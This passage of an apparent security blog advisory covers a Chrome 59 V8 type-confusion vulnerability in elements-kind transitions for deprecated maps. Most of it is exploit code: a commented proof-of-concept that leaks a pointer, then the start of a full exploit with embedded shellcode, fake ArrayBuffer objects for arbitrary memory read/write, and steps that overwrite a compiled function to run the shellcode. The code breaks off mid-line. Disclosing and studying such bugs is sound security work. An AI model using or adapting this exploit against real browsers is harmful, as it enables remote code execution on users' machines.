class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-56\">56<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-2\"><span class=\"crayon-c\">\/\/ The function that will be optimized to change elements kind. Could be called the \u201cevil\u201d function.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-3\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-5\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-6\"><span class=\"crayon-c\">\/\/ The function that will be optimized to read values directly as unboxed (and will therefore read pointers as values). Could also be called the \u201cevil\u201d function.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-7\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">read_as_unboxed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-11\"><span class=\"crayon-c\">\/\/ First, we want to make the function compile. Call it.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-12\"><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-14\"><span class=\"crayon-c\">\/\/ Construct a new object. Let\u2019s call it\u2019s map M0.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-15\"><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-16\"><span class=\"crayon-c\">\/\/ We add the property \u2018x\u2019. M0 will now have an \u2018x\u2019 transition to the new one, M1. <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-17\"><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-18\"><span class=\"crayon-c\">\/\/ Call the function with this object. A version of the function for this M1 will be compiled.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-19\"><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-21\"><span class=\"crayon-c\">\/\/ Change the object\u2019s \u2018x\u2019 property type. The previous \u2018x\u2019 transition from M0 to M1 will be removed, and M1 will be deprecated. A new map, M2, with a new \u2018x\u2019 transition from M0 is generated.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-22\"><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-26\"><span class=\"crayon-c\">\/\/ Generate the object we\u2019ll use for the vulnerability. Make sure it is of the M2 map.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-27\"><span class=\"crayon-v\">evil<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-28\"><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-30\"><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-31\"><span class=\"crayon-c\">\/\/ Optimize change_elements_kind. <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-32\"><span class=\"crayon-c\">\/\/ ReduceElementAccess will be called, and it will in turn call ComputeElementAccessInfos. In the code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-33\"><span class=\"crayon-c\">\/\/ snippet below (same as before), we can see that the code runs through all the maps (Note: these are \/\/ maps that have already been used in this function and compiled), and tries to update each of them.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-34\"><span class=\"crayon-c\">\/\/ When reaching M1, TryUpdate will see that it\u2019s deprecated and look for a suitable non-deprecated <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-35\"><span class=\"crayon-c\">\/\/ map, and will find M2, since it has the same properties. Therefore, an elements kind transition will be <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-36\"><span class=\"crayon-c\">\/\/ created from M2.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-37\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x50000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-39\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-41\"><span class=\"crayon-c\">\/\/ Optimize read_as_unboxed. Evil is currently an instance of the M2 map, so the function will be<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-42\"><span class=\"crayon-c\">\/\/ optimized for that, and for fast element access (evil only holds unboxed numbered properties).<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-43\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x50000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">read_as_unboxed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-45\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-47\"><span class=\"crayon-c\">\/\/ Trigger an elements kind change on evil. Since change_elements_kind was optimized with an<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-48\"><span class=\"crayon-c\">\/\/ elements kind transition, evil\u2019s map will only be changed to reflect the new elements kind.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-49\"><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-51\"><span class=\"crayon-c\">\/\/ Call read_as_unboxed. It\u2019s still the same M2 so a cache miss does not occur, and the optimized <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-52\"><span class=\"crayon-c\">\/\/ version is executed. However, that version assumes that the values in the elements array are unboxed<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-53\"><span class=\"crayon-c\">\/\/ so the Array constructor pointer (stored at position 0 in change_elements_kind) will be returned as a<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-54\"><span class=\"crayon-c\">\/\/ double.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-55\"><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">read_as_unboxed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-56\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p><strong><u>Patch<\/u><\/strong><br \/> Very simple, an <em>is_stable()<\/em> check is added before the call to <em>FindElementsKindTransitionedMap<\/em>.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3.png\" data-slb-active=\"1\" data-slb-asset=\"1231653416\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3-300x113.png\" alt=\"\" width=\"300\" height=\"113\" class=\"alignnone size-medium wp-image-3384\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3-300x113.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3-768x290.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3.png 876w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong><u>Full Proof of Concept<\/u><\/strong><\/p>\n<p>The following PoC will run calc when attacking a \u2013no-sandbox chrome version 59. <\/p>\n<ol>\n<li>The vulnerability is used to read the address of <em>arraybuffer.__proto__<\/em>.<\/li>\n<li>We build a fake <em>ArrayBuffer<\/em> map (using the address of the arraybuffer proto needed in a map), and use the vulnerability to read the address of the fake map.<\/li>\n<li>Using the address of the fake map, we can build a fake <em>ArrayBuffer<\/em> object with that map, and use the vulnerability again to get it\u2019s address.<\/li>\n<li>We use the vulnerability to write the pointer to our fake <em>ArrayBuffer<\/em> into a boxed elements array, allowing us to now access our fake <em>ArrayBuffer<\/em> regularly from JS code. At the same time, we can edit the fake <em>ArrayBuffer<\/em> to reflect different parts of usermode memory. So we now have full read\/write access. We use the vulnerability one more time to read the address of a compiled function, and then use our R\/W capabilities to override that with our shellcode, and eventually call the function to execute the shellcode.<\/li>\n<\/ol>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d8266a7993443183\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;    var shellcode = [0xe48348fc,0x00c0e8f0,0x51410000,0x51525041,0xd2314856,0x528b4865,0x528b4860,0x528b4818,0x728b4820,0xb70f4850,0x314d4a4a,0xc03148c9,0x7c613cac,0x41202c02,0x410dc9c1,0xede2c101,0x48514152,0x8b20528b,0x01483c42,0x88808bd0,0x48000000,0x6774c085,0x50d00148,0x4418488b,0x4920408b,0x56e3d001,0x41c9ff48,0x4888348b,0x314dd601,0xc03148c9,0xc9c141ac,0xc101410d,0xf175e038,0x244c034c,0xd1394508,0x4458d875,0x4924408b,0x4166d001,0x44480c8b,0x491c408b,0x8b41d001,0x01488804,0x415841d0,0x5a595e58,0x59415841,0x83485a41,0x524120ec,0x4158e0ff,0x8b485a59,0xff57e912,0x485dffff,0x000001ba,0x00000000,0x8d8d4800,0x00000101,0x8b31ba41,0xd5ff876f,0xa2b5f0bb,0xa6ba4156,0xff9dbd95,0xc48348d5,0x7c063c28,0xe0fb800a,0x47bb0575,0x6a6f7213,0x89415900,0x63d5ffda,0x00636c61]  \t  var arraybuffer = new ArrayBuffer(20);  flag = 0;  function gc(){      for(var i=0;i&lt;0x100000\/0x10;i++){          new String;      }  }  function d2u(num1,num2){      d = new Uint32Array(2);      d[0] = num2;      d[1] = num1;      f = new Float64Array(d.buffer);      return f[0];  }  function u2d(num){      f = new Float64Array(1);      f[0] = num;      d = new Uint32Array(f.buffer);      return d[1] * 0x100000000 + d[0];  }  function change_to_float(intarr,floatarr){      var j = 0;      for(var i = 0;i &lt; intarr.length;i = i+2){          var re = d2u(intarr[i+1],intarr[i]);          floatarr[j] = re;          j++;      }  }  function change_elements_kind_array(a){  \ta[0] = Array;  }  optimizer3 = new Array({});   optimizer3.x3 = {};  change_elements_kind_array(optimizer3);  map_manipulator3 = new Array(1.1,2.2);   map_manipulator3.x3 = 0x123;  change_elements_kind_array(map_manipulator3);    map_manipulator3.x3 = {};    evil3 = new Array(1.1,2.2);  evil3.x3 = {};  for(var i = 0;i&lt;0x100000;i++){  \tchange_elements_kind_array(optimizer3);  }    \/******************************* step 1    read ArrayBuffer __proto__ address   ***************************************\/  function change_elements_kind_parameter(a,obj){  \targuments;  \ta[0] = obj;  }  optimizer4 = new Array({});   optimizer4.x4 = {};  change_elements_kind_parameter(optimizer4);  map_manipulator4 = new Array(1.1,2.2);   map_manipulator4.x4 = 0x123;  change_elements_kind_parameter(map_manipulator4);    map_manipulator4.x4 = {};    evil4 = new Array(1.1,2.2);  evil4.x4 = {};  for(var i = 0;i&lt;0x100000;i++){  \tchange_elements_kind_parameter(optimizer4,arraybuffer.__proto__);  }    function e4(){  \treturn evil4[0];  }    for(var i = 0;i&lt;0x100000;i++){  \te4();  }    change_elements_kind_parameter(evil4,arraybuffer.__proto__);  ab_proto_addr = u2d(e4());    var nop = 0xdaba0000;  var ab_map_obj = [  \tnop,nop,  \t0x1f000008,0x000900c3,   \/\/chrome 59  \t\/\/0x0d00000a,0x000900c4,  \/\/chrome 61  \t0x082003ff,0x0,  \tnop,nop,   \/\/ use ut32.prototype replace it  \tnop,nop,0x0,0x0  ]  ab_constructor_addr = ab_proto_addr &#8211; 0x70;  ab_map_obj[0x6] = ab_proto_addr &amp; 0xffffffff;  ab_map_obj[0x7] = ab_proto_addr \/ 0x100000000;  ab_map_obj[0x8] = ab_constructor_addr &amp; 0xffffffff;  ab_map_obj[0x9] = ab_constructor_addr \/ 0x100000000;  float_arr = [];    gc();  var ab_map_obj_float = [1.1,1.1,1.1,1.1,1.1,1.1];  change_to_float(ab_map_obj,ab_map_obj_float);    \/******************************* step 2    read fake_ab_map_ address   ***************************************\/    change_elements_kind_parameter(evil4,ab_map_obj_float);  ab_map_obj_addr = u2d(e4())+0x40;    var fake_ab = [  \tab_map_obj_addr &amp; 0xffffffff, ab_map_obj_addr \/ 0x100000000,  \tab_map_obj_addr &amp; 0xffffffff, ab_map_obj_addr \/ 0x100000000,  \tab_map_obj_addr &amp; 0xffffffff, ab_map_obj_addr \/ 0x100000000,  \t0x0,0x4000, \/* buffer length *\/  \t0x12345678,0x123,\/* buffer address *\/  \t0x4,0x0  ]  var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];  change_to_float(fake_ab,fake_ab_float);    \/******************************* step 3    read fake_ArrayBuffer_address   ***************************************\/    change_elements_kind_parameter(evil4,fake_ab_float);  fake_ab_float_addr = u2d(e4())+0x40;    \/******************************* step 4 fake a ArrayBuffer   ***************************************\/    fake_ab_float_addr_f = d2u(fake_ab_float_addr \/ 0x100000000,fake_ab_float_addr &amp; 0xffffffff).toString();    eval(&#8216;function e3(){  evil3[1] = &#8216;+fake_ab_float_addr_f+&#8217;;}&#8217;)  for(var i = 0;i&lt;0x6000;i++){  \te3();  }  change_elements_kind_array(evil3);  e3();  fake_arraybuffer = evil3[1];  if(fake_arraybuffer instanceof ArrayBuffer == true){  }  fake_dv = new DataView(fake_arraybuffer,0,0&#215;4000);    \/******************************* step 5 Read a Function Address   ***************************************\/    var func_body = &#8220;eval(&#8221;);&#8221;;    var function_to_shellcode = new Function(&#8220;a&#8221;,func_body);    change_elements_kind_parameter(evil4,function_to_shellcode);    shellcode_address_ref = 